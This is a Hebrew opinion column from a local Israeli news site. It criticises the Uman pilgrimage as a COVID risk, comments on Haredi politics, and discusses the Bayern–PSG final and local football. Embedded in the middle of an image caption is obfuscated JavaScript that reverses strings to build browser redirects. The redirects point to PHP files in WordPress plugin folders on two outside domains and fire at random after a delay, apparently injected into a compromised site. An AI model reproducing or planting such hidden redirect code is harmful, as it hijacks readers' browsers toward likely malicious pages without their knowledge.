fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

בדרך לסגר

אומן הפכה לקרנבל שאין תמיד קשר בינו לבין אמונה, אלא יותר צורך בטיול לחו"ל, הפנינג ענקי במחיר שווה. לכן, צדק הפרויקטור גמזו כשביקש לעצור את התהליך בהנחה שיש פה סכנה ברורה להתפשטות המגפה
מסורת מכאן ועכשיו ולא מדאורייתא. אומן, אוקראינה | צילום: shutterstock
מסורת מכאן ועכשיו ולא מדאורייתא. אומן, אוקראינה | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

קרנבל אומן

הטיסות בראש השנה אל אומן באוקראינה כבר הפכו מזמן לסרט בורקס מהזן הנחות ביותר. אל הגרעין הקשה שבנו, מסורת מכאן ועכשיו ולא מדאורייתא, הצטרפו במשך השנים אלפי טרמפיסטים, חלקם מסורתיים וחלקם לא, שראו הזדמנות לטייל ולחגוג בחו"ל במחירים שווים לכל נפש. רבים מהם אפילו לא חיפשו מזור לנפש אלא יותר מזור לגוף, והמבין יבין.

אומן הפכה לקרנבל שאין תמיד קשר בינו לבין אמונה, אלא יותר צורך בטיול לחו"ל, הפנינג ענקי במחיר שווה. לכן, צדק הפרויקטור גמזו כשביקש לעצור את התהליך בהנחה שיש פה סכנה ברורה להתפשטות המגפה ובמעבר הנגיף ממדינה אדומה אחת למדינה אדומה שנייה.

השבוע דיברתי עם רופא מבית חולים בצפון שסיפר לי שמחלקת הקורונה כבר בתפוסה מלאה וכי המקור המרכזי להדבקות הם חתונות בניגוד לתקנות אצל הערבים ואצל החרדים. כמו כן הוא מספר, כי בקרב החרדים יש רבים שמאמינים שאין בכלל קורונה וכי זוהי קונספירציה חילונית של הממשל נגדם.

במצב עניינים כזה, כאשר שר השיכון ליצמן, שהוא שליחו של הרבי מגור, קורא לפרופ' גמזו להתפטר, כולנו מבינים שהפוליטיקה ניצחה את הקורונה במקום שנהיה במצב הפוך, וכל אזרחי ישראל משלמים וישלמו את המחיר, וכל מה שנותר לכולם זה להתפלל לפיתוח מהיר של החיסון, כי מבחינת היכולת החברתית להכיל ולהתגבר עליו, אנו מדינת עולם שלישי עם דפוסי התנהגות כמו בטורקיה ובברזיל, וכנראה שהפסדנו במערכה הזאת, ובסוף לא תהיה ברירה ויגיע סגר נוסף על כל המשתמע מכך.

הגמר

יותר ממיליארד בני אדם צפו בטלוויזיה במשחק הגמר בין ביירן מינכן לפריז סאן ז'רמן, משחק שהתקיים בליסבון ללא קהל. העולם צמא לכדורגל ומשחק הגמר סיפק את הסחורה.

ראינו משחק כדורגל מהיר מאוד, וצריך לזכור שהקבוצות השנה בעידן קורונה לא היו אמורות להיות כל כך טובות מבחינת כושר גופני. אחרי שריקת הסיום, כשהתברר שוב עד כמה המשפט המיתולוגי שכדורגל משחקים 90 דקות ובסוף הגרמנים מנצחים 0:1, המשפט הזה שריר וקיים יותר מאי פעם, והשאלה הגדולה היא לאן הולך ענף הספורט הזה בעידן המגפה, כיצד יתפקד בזמן משבר שכרגע לא רואים את סופו, האם באמת שחקנים שווים את המחיר האסטרונומי שמשולם עבורם, והאם הבעלים של הקבצות הגדולות ימשיכו להזרים כספים לתוך ענף שהופך להיות וירטואלי, ומטבע הדברים ייווצר פחות עניין מאשר בעבר.

ואם נחזור לרגע לזירה המקומית, אני חושב שלמרקו בלבול היה מגיע קרדיט לעשות עוד עונה בתפקיד מאמן מכבי חיפה וכמו כן אסור היה לשחרר את סינטיהו סולליך, בשר מבשרה של מכבי חיפה, שחקן מוכשר שאפשר וצריך היה להסתדר איתו.

כדורגל הוא כמו כל עסק ובעידן משברי לא רצוי להחליף את הקברניט ואת השחקנים הטובים, אלא ליצור ניהול לימי צנע ומשבר עד יעבור זעם.

ועדיין במקומי. הבעלים של מכבי תל אביב קיבל החלטה אסטרטגית בפרשת המין של עומר אצילי ודור מיכה. יש לציין שהוא לא הראשון שנהג כך. גם יעקב שחר לפני 35 שנה סגר עניין עם שחקן צמרת במועדון שקיים יחסי מין עם אשתו של השוער ויקטור צ'נוב. אותו שחקן לא זכה לשום תפקיד באגודה למרות שהוא אדם מוכשר. איך אמר בזמנו יענק'לה שחר, יש אלפי בחורות בחיפה, למה התעסקת דווקא איתה ושברת את רוחו של השוער שלנו.

אהבתם את הטור של צ'רקס? טורים נוספים כאן

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות